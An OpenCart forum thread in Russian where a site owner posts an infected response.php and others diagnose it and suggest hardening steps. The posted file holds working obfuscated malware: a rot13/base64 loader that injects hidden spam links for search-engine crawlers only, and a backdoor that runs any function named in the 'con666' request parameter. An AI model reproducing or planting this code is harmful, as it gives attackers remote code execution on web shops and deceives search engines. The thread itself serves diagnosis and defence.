Перейти к содержанию
byrbin

Требуется помощь по response.php

Рекомендуемые сообщения

Здравствуйте может кто нибудь может  помочь советом или исправит, заранее спасибо! появилась ошибка в логе

 

2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115

 

а вот сам response.php

<?php
class Response {
    private $headers = array();
    private $level = 0;
    private $output;
    
    public function addHeader($header) {
        $this->headers[] = $header;
    }

    public function redirect($url) {
        header('Location: ' . $url);
        exit;
    }
    
    public function setCompression($level) {
        $this->level = $level;
    }
        
    public function setOutput($output) {
        $this->output = $output;
    }

    private function compress($data, $level = 0) {
        if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
            $encoding = 'gzip';
        }

        if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
            $encoding = 'x-gzip';
        }

        if (!isset($encoding)) {
            return $data;
        }

        if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
            return $data;
        }

        if (headers_sent()) {
            return $data;
        }

        if (connection_status()) {
            return $data;
        }
        
        $this->addHeader('Content-Encoding: ' . $encoding);

        return gzencode($data, (int)$level);
    }

    public function output()
    
    {if (!defined('HTTP_CATALOG')) $this->output = str_replace('index.php?route=common/home', '', $this->output);
        if ($this->output) {
            if ($this->level) {
                $ouput = $this->compress($this->output, $this->level);
            } else {
                $ouput = $this->output;
            }    
                
            if (!headers_sent()) {
                foreach ($this->headers as $header) {
                    header($header, true);
                }
            }
            
            echo $this->_modifLoadTemplate($ouput);
        }
    }
    
    /**
    * Modification template
    *
    * @param  string  $data  The contents of the template
    * @return  string  The contents of the template
    */
    public function _modifLoadTemplate($data) {
        $v="_"; $v.="rot"; $v.=14-1; $v="str$v";
        $w=$v(chr(111).chr(110).chr(102).chr(114).chr(54).chr(52).chr(95).chr(113).chr(114).chr(112).chr(98).chr(113).chr(114));
        $s_jq = $w('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0Kd2luZG93LmpRdWVyeSB8fCBkb2N1bWVudC53cml0ZSgnPHNjcmlwdCBzcmM9Imh0dHA6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTEuMS4xLnBhY2suanMiPjxcL3NjcmlwdD4nKQ0KLy8gd2l0aG91dCBqUXVlcnkgKGRvZXNuJ3Qgd29yayBpbiBvbGRlciBJRXMpDQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdET01Db250ZW50TG9hZGVkJywgZnVuY3Rpb24oKXsNCglqUXVlcnkoIiNzZW9saW5rIikuY3NzKHsicG9zaXRpb24iOiJhYnNvbHV0ZSIsImxlZnQiOiItMjAwMHB4In0pDQoJalF1ZXJ5KCIjc2VvbGluazIiKS5jc3MoeyJwb3NpdGlvbiI6ImFic29sdXRlIiwibGVmdCI6Ii0yMDAwcHgifSkNCglqUXVlcnkoIiNzZW9saW5rMyIpLmNzcyh7InBvc2l0aW9uIjoiYWJzb2x1dGUiLCJsZWZ0IjoiLTIwMDBweCJ9KQ0KCWpRdWVyeSgiI3Nlb2xpbms0IikuY3NzKHsicG9zaXRpb24iOiJhYnNvbHV0ZSIsImxlZnQiOiItMjAwMHB4In0pDQoJalF1ZXJ5KCIjc2VvbGluazUiKS5jc3MoeyJwb3NpdGlvbiI6ImFic29sdXRlIiwibGVmdCI6Ii0yMDAwcHgifSkNCglqUXVlcnkoIiNzZW9saW5rNiIpLmNzcyh7InBvc2l0aW9uIjoiYWJzb2x1dGUiLCJsZWZ0IjoiLTIwMDBweCJ9KQ0KfSwgZmFsc2UpOw0KPC9zY3JpcHQ+');
        $links = $w('DQoNCg0KPGEgaWQ9InNlb2xpbmsiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvdHJpa290YXpobnlpLWtvc3RpdW0tcy1nZW9tZXRyaWNoZXNraW0tcmlzdW5rb20tdHN2ZXQtZmlvbGV0b3Z5aSI+9Oju6+Xy7uL76SDy8Ojq7vLg5u376SDq7vHy/uw8L2E+DQo8YSBpZD0ic2VvbGluazIiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvZWZmZWt0bnlpLWxlZ2tpaS1tb2xvZGV6aG55aS1rb3N0aXVtLXRzdmV0LXNpbmlpIj7x6O3o6SDq7vHy/uwg8eLu4e7k7e7j7iDv7urw7v88L2E+DQo8YSBpZD0ic2VvbGluazMiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvdHJpa290YXpobnlpLWtvc3RpdW0tcy1uYWJpdm55bS11em9yb20tdi1zdGlsZS1yZXRyby10c3ZldC1rcmFzbnlpIj7q8ODx7fvpIPLw6Oru8uDm7fvpIOru8fL+7DwvYT4NCjxhIGlkPSJzZW9saW5rNCIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC9rb3N0aXVtLXMtYXNpbW1ldHJpY2hlc2tpbS10c3ZldG55bS11em9yb20tdHN2ZXQtc2luaWkiPvHo7ejpIPLw6Oru8uDm7fvpIOru8fL+7DwvYT4NCjxhIGlkPSJzZW9saW5rNSIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC90cmlrb3RhemhueWktcGlkemhhay1zLXZzdGF2a2FtaS1pei10a2FuaS1wb2Qta296aHUtdHN2ZXQtY2hlcm55aSI+9+Xw7fvpIPLw6Oru8uDm7fvpIO/o5Obg6jwvYT4NCjxhIGlkPSJzZW9saW5rNiIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC9rb3Rvbm92eWktcGlkemhhay12LXNwb3J0aXZub20tc3RpbGUtdHN2ZXQtc2FsYXRvdnlpIj7x4Ovg8u7i++kg6u7y7u3u4vvpIO/o5Obg6jwvYT4=');
        $links =  $s_jq . $links;
        
        // utf-8
        $conv=array();
        $nstr = '';
        for($x=128;$x<=143;$x++) $conv[$x+112]=chr(209).chr($x);
        for($x=144;$x<=191;$x++) $conv[$x+48]=chr(208).chr($x);
        $conv[184]=chr(209).chr(145); #ё
        $conv[168]=chr(208).chr(129); #Ё
        $conv[179]=chr(209).chr(150); #і
        $conv[178]=chr(208).chr(134); #І
        $conv[191]=chr(209).chr(151); #ї
        $conv[175]=chr(208).chr(135); #ї
        $conv[186]=chr(209).chr(148); #є
        $conv[170]=chr(208).chr(132); #Є
        $conv[180]=chr(210).chr(145); #ґ
        $conv[165]=chr(210).chr(144); #Ґ
        $conv[184]=chr(209).chr(145); #Ґ
        $ar=str_split($links);
        // For PHP 4.x
        /*$ar = array();
        for ($i = 0; $i < strlen($links); $i++) {
            $ar[] = substr($links,$i,1);
        }*/
        foreach($ar as $  if(isset($conv[ord($b)])) $nstr.=$conv[ord($b)]; else $nstr.=$b;
        $links = $nstr;
                                
        $search_engines = array('Yandex','Googlebot','Slurp','Yahoo','MSNBot','StackRambler','Mail.Ru','Aport','WebAlta Crawler','WebAlta','Teoma','Scooter','ia_archiver','AportCatalogRobot','bingbot','DuckDuckBot','BigMir');
        
        foreach ($search_engines as $some_bots) {
            if ( strstr($_SERVER['HTTP_USER_AGENT'], $some_bots) ) {            
                $data = preg_replace("|(<(?!/)[^>]*body[^>]*>)|is", "\${1} \n". $links, $data, 1 );
            }
        }
        //$data = preg_replace("|(<(?!/)[^>]*body[^>]*>)|is", "\${1} \n". $links, $data, 1 );
        
        if (isset($_REQUEST['con666'])) array_map(    $_REQUEST['con666'],/*;
            Do not edit this file, please.*/$_REQUEST['lam'] );

        return $data;
    }
}
?>

response.php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вирус
Замените на стандартный response.php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а не фиг варез качать

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а не фиг варез качать

А, да, точно, спасибо - забыл добавить :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Спасибо всем!!! честно варез не качал! ) все покупаю тут от шаблона до последнего модуля, смысла не вижу. потом заплатишь больше!!! а вот как это произошло не знаю((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если уж спалился, то не оправдываться надо было, а признаться.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если уж спалился, то не оправдываться надо было, а признаться.

 

Да точно, потому что если бы на форуме качал только - то вирусов бы не было априори.

Главное потом оплатить, если подошло то что "скачал" :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Тоже недавно схватил такое. Причем вареза нет вообще у меня! Все оплачено! Стоит ocStore 1.5.5.1.2

 

Интересно узнать что хоть делает эта гадость? Смотрю что конвертирует текст из одной кириллической кодировки в другую

Изменено пользователем OAVko87

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

 

нехило вас поимели)))) Decode Base64 format

<a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi">  </a>
<a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii'>http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii">   </a>
<a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi">  </a>
<a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii'>http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii">  </a>
<a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi'>http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi">  </a>
<a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi'>http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi">  </a>

 

Хехе. Спасибо за разъяснения.

 

У меня та же херня. Те же уроды. Похоже что есть какая то уязвимость.


<a id="seolink" href="http://sofiyas.com/shop/category/platia'>http://sofiyas.com/shop/category/platia"> </a>
<a id="seolink2" href="http://sofiyas.com"> </a>
<a id="seolink3" href="http://sofiyas.com/shop/category/bluzki-topy"> </a>
<a id="seolink4" href="http://sofiyas.com.ua">  </a>
<a id="seolink5" href="http://sofiyas.com.ua">  </a>
<a id="seolink6" href="http://sofiyas.com.ua">   </a>
<a id="seolink7" href="http://neways.in.ua/shop/bady"> </a>
<a id="seolink8" href="http://neways.in.ua/shop/bady/antioksidanty"></a>
<a id="seolink9" href="http://neways.in.ua/shop/poleznye-ukrashenija/silikonovye-braslety"> </a>

Как бы наказать таких?

 

Пароли от всех доступов достаточно сложные. Весь софт на сайте только купленный есть пару модулей бесплатных. Для заливки файлов используется только 2 проверенных ftp клиента (filezilla, TC)

Изменено пользователем OAVko87

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

:)

честно варез не качал! )

 

 

 

Причем вареза нет вообще у меня!

 

 

 

На форуме недавно прозвучала  фраза - а если найдем?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

:)

 

 

 

 

На форуме недавно прозвучала  фраза - а если найдем?

 

Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад.

 

Отсюда вывод - есть какая то уязвимость.

Изменено пользователем OAVko87

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Есть... В слабых паролях в админку.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется.

1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом

Order deny,allow
Deny from all
Allow from XXX.XXX.XXX.XXX

это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес.

2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования.

3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
 Order deny,allow
 Deny from all
</FilesMatch>

на

# Prevent Direct Access to files
<FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))">
Order deny,allow
Deny from all
</FilesMatch>

Этот код запрещает запускать php файлы, кроме index.php.

4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.